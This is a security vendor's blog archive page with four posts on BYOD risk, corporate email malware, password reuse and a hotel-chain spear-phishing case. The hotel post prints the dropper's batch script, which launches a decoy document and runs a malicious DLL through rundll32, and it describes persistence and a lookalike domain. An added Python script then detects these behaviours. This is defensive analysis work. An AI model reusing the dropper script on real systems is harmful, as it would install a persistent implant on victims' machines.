Tag Archives: Adaptive Defense 360

BYOD: when protecting the perimeter is not enough

It’s a well-known fact that millennials and generation Z are digital natives and are basically always connected to their gadgets.  This trend has consequences extending beyond the consumer market, with an effect on the corporate world as this young cohort enters the workforce.  One example is more people using their own laptops and mobile phones at the office and for work in general. The consultancy firm Markets & Markets estimates the Bring Your Own Device (BYOD) market will be worth $73.3 billion in 2021.

BYOD has several advantages for companies. IT managers note that employee productivity is on the rise and workers have more flexibility, resulting in better customer service. That said, it also presents various challenges for security that go beyond a company’s physical perimeter. What risks does BYOD entail? What is the best way of dealing with them?

The perimeter includes wherever an employee is located

Companies are exposed to a high number of threats coming from all sides, from dangerous web content to malware that can affect the entire corporate network. Attacks are increasing in frequency, resulting in more attention being paid to cybersecurity. That’s why the firm Cybersecurity Ventures estimates that the total spend on cybersecurity will hit one trillion dollars in the next five years.

However, many of these investments in cybersecurity only protect devices and servers on the corporate network. With BYOD, it’s clear that only protecting the physical perimeter is insufficient. The trend has resulted in personal mobile devices such as smartphones, tablets, and laptops, which are not under direct control of IT managers, being able to access the corporate network from anywhere. This means that the perimeter extends to anywhere employees are located, no matter how far they may be from the office. Thus, it is necessary that protection covers all devices.

The need for a BYOD policy

To prevent security risks and before applying solutions, it is essential for companies, regardless of their size, to establish a BYOD policy with a clear blueprint and adapt it to all platforms so that they are properly prepared. Accordingly, consultant Larry Alton recommends that a BYOD strategy include specific guidelines.  Once the criteria for program use are established, IT managers should allow employees to add their personal devices to the network.

However, this does not mean that IT has strict control over employees’ devices. The ideal situation is to strike a balance between keeping a company’s data secure and safeguarding the privacy of employees, who will of course continue using their devices for personal use. Excessively strict or invasive policies are therefore counterproductive. Policies should be completely transparent so that each party’s responsibility is clear.

Monitoring solutions down to the endpoint

Given the nature of the security risks of BYOD, organizations should implement solutions that apply constant real-time monitoring of the corporate network and of all its access points. Generally, security solutions only address servers and workstations within the physical space of the company but, as we mentioned before, with BYOD, simply protecting the physical perimeter is not enough. Therefore, protection should extend to all endpoints and devices.

One example of this type of solution is Panda Adaptive Defense, an endpoint detection and response service capable of accurately classifying any application and blocking advanced threats as well as zero-day and directed attacks that other more traditional solutions are incapable of detecting.

Although BYOD presents new security risks, the opportunities it offers companies and employees far outweigh these risks if the necessary precautions are taken. A prevention strategy based on appropriate policies and on real-time monitoring solutions for all devices is the best way to take advantage of BYOD’s full potential.

The post BYOD: when protecting the perimeter is not enough appeared first on Panda Security Mediacenter.


Corporate email addresses receive four times more malware than personal ones


Cyber-attacks cost companies millions of euros each year. A high price to pay which, according to a study conducted by Google’s Research Team, is not only due to the growing sophistication of the strategies and tools used by cyber-crooks, but also to the huge number of threats in circulation.

Researchers examined over 1 billion email exchanges via Gmail to analyze the diversity and prevalence of the attacks perpetrated via email in corporate environments.

The report concludes that while spam campaigns continue to be the most common type of attack on both personal and corporate accounts, malware and phishing campaigns are primarily aimed at companies and their employees.

After comparing the figures for corporate and consumer inboxes, researchers found that companies are four times more likely to receive malware than home users. And, regarding malware types, ransomware continues to be the attackers’ weapon of choice. Additionally, corporate email addresses are approximately six times more likely to receive phishing emails than personal accounts.

This is due to the fact that corporations tend to store more valuable information, which can be much more easily monetized on the Dark Web.

Most affected countries and industries

In addition to this global research, Google’s experts also looked at the industries and types of organizations most affected by cyber-attacks. “Attackers appear to choose targets based on multiple dimensions, such as the size and the type of the organization, its country of operation, and the organization’s sector of activity,” conclude Google’s researchers.

In this context, the data obtained reveals that while cyber-crooks aim malware attacks at nonprofits and educational organizations primarily, businesses are the most common target of phishing and spam attacks.  More precisely, spam campaigns mostly target companies in the entertainment and IT sectors. These, together with real-estate companies, were the organizations most hit by cyber-attacks in the first months of 2017.

According to the report, “The largest spammers in the world target other countries.” In this respect, the list of most affected countries is topped by the United States, Germany and France, with Spain in seventh place.

Furthermore, financial organizations such as banks, consulting firms or insurance companies are the preferred target of phishing campaigns. Far from decreasing in number, experts believe that cyber-attacks will continue to grow in the future. That’s why it is advisable to implement measures such as two-step authentication and cyber-security solutions that combine context intelligence and defense operations to anticipate and stop malicious behaviors and data leaks.


The post Corporate email addresses receive four times more malware than personal ones appeared first on Panda Security Mediacenter.


Even the inventor of the World Wide Web can be hacked. What about us?

Even the inventor of the World Wide Web, Mr. Tim Berners-Lee, can have his password stolen. The hackers were able to access IT resources belonging to the organization that governs the Web (W3C). This makes us wonder: Is there a company that isn’t vulnerable to this type of attack?


We all face the same problem: We are only as strong as our weakest link. Stealing the password belonging to a single employee, especially if their access level is high (for example, a manager), is sufficient means for a cyber-criminal to sneak into a company’s entire system.


According to a recent report by the Cloud Security Alliance (CSA), nearly a quarter (22%) of the IT breaches in companies began with a single password leak. In addition, 65 per cent of the study’s participants believe that there is a medium to high chance that there will be future risks caused by a compromised password.


A fourth of IT breaches began with a single password leak



Pictured: Tim Berners-Lee, the inventor of the World Wide Web

Like many others, Tim Berners-Lee’s situation could have been easily avoided. If an attacker was able to get in through a back door of the W3C, it was because Berners-Lee reused passwords. It is possible that he used the same password as the one he used for the IRC chats with which he communicated with his team.


The intruder initially got into the system using Berners-Lee’s information, then the same password opened other access points without problem. It was even possible to sneak into the web’s editing area, retouch the founder’s profile, and leave an encryption seal to prove that the cyber-criminal had been there.


To avoid being in this situation, there’s a simple and effective measure that should be followed by everyone in your company: use a different password for every service. That way, if one of your passwords is stolen, cyber-criminals will not have access to other resources belonging to your company.

Likewise, it’s also important to have a dependable security solution for your business to fall back on, like Panda Adaptive Defense 360, which is able to protect corporate information against theft by both external and internal threats.

The post Even the inventor of the World Wide Web can be hacked. What about us? appeared first on Panda Security Mediacenter.


Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

[Image: advanced attacks hotels]

This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Although it displays a Word icon, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file are shown below:

@echo off
start "" ROCA.ING.docx
Set xOS=x64

IF "%xOS%" == "x64" (start "" C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
IF "%xOS%" == "x86" (start "" C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
ping -n 12 localhost

As we can see, the first thing it does on the victim’s machine is open the Word document, so that the decoy is complete. Then, adobeUpd.dll is run through rundll32.exe with the export “Wenk” as its parameter. While executing, it modifies the file and marks it as read-only and hidden, and creates an entry in the Windows registry so that it runs every time the computer is turned on.

It then contacts a specific URL:


Next it downloads a file and checks whether it contains the user value given as the URL parameter (iPmbzfAIRMFw). If it matches, it attempts to download the file


When we try to download it, it is not available; it was never present on our customer’s system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same as our customer’s domain, except that theirs ends in “.com” while the attackers registered a domain with the same name in Gabon (“.ga”). This way, the similarity to the legitimate domain name will not attract attention if it is seen by the hotel’s security team when analyzing network traffic.

In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code of adobeUpd.dll we can see that it actually looks for a specific marker in this file, then decrypts the data following it and runs it as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll remains in a loop, connecting at random intervals of several minutes to:


As we see, this attack is specifically directed at this hotel chain. The criminals have already removed all traces of the server the malware connected to, and since we aborted the attack we can only speculate about what they were going to do next. In our experience, this type of attack seeks to compromise a computer inside the victim’s enterprise and then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.

Traditional anti-virus does not work against this type of attack, since these threats are created specifically for one victim and the attackers always make sure that the malware is not detected by the signatures, proactive technologies, etc. built into current anti-malware solutions. That is why EDR services (Endpoint Detection & Response) equipped with advanced protection technology are vital for effective protection against these attacks.
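Two of the behaviours described in this post are easy to hunt for in endpoint and DNS telemetry: rundll32.exe launched from a batch file (cmd.exe) with a DLL given by bare name outside C:\Windows, and a lookalike of the company’s own domain under a different TLD (.ga instead of .com). The following triage script is an added example, not code from Panda or from the original article; the log format, the corporate domain examplehotel.com and the sample events are all constructed assumptions.

```python
import re

CORPORATE_DOMAIN = "examplehotel.com"  # placeholder; the real customer domain is not in the article

# Constructed sample telemetry (not from the article), one event per line:
# "proc" events carry parent image, child image and command line; "dns" events carry the queried name.
SAMPLE_LOG = """\
proc parent=cmd.exe image=C:\\Windows\\SysWOW64\\rundll32.exe cmdline="rundll32.exe adobeUpd.dll,Wenk"
proc parent=explorer.exe image=C:\\Windows\\System32\\rundll32.exe cmdline="rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"
dns query=examplehotel.ga
dns query=mail.examplehotel.com
dns query=examplehotel.com
"""

_FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Split 'kind k=v k="v with spaces"' into a dict; the leading kind becomes event['type']."""
    kind, _, rest = line.partition(" ")
    fields = {k: (quoted if quoted else bare) for k, quoted, bare in _FIELD.findall(rest)}
    fields["type"] = kind
    return fields

def suspicious_rundll32(ev):
    """rundll32 spawned by cmd.exe loading a DLL that is not under C:\\Windows (e.g. adobeUpd.dll,Wenk)."""
    if ev.get("type") != "proc" or not ev.get("image", "").lower().endswith("rundll32.exe"):
        return False
    m = re.match(r'\S*rundll32\.exe\s+(\S+?),(\w+)', ev.get("cmdline", ""), re.I)
    if not m:
        return False
    dll = m.group(1).lower()
    return ev.get("parent", "").lower() == "cmd.exe" and not dll.startswith("c:\\windows\\")

def lookalike_domain(query, corporate=CORPORATE_DOMAIN):
    """True when the registrable label matches the corporate one but the TLD differs (example.com vs example.ga)."""
    corp_label, corp_tld = corporate.lower().rsplit(".", 1)
    parts = query.lower().rstrip(".").split(".")
    if len(parts) < 2:
        return False
    label, tld = parts[-2], parts[-1]
    return label == corp_label and tld != corp_tld

def triage(log_text):
    """Return (rule, evidence) hits for every event in the log that matches one of the two rules."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if suspicious_rundll32(ev):
            hits.append(("rundll32-dropper", ev["cmdline"]))
        elif ev["type"] == "dns" and lookalike_domain(ev["query"]):
            hits.append(("lookalike-domain", ev["query"]))
    return hits
```

Run over the constructed log, triage() flags only the cmd.exe-spawned rundll32 loading adobeUpd.dll and the examplehotel.ga query; the legitimate rundll32 use and the real corporate domain pass clean.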

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.
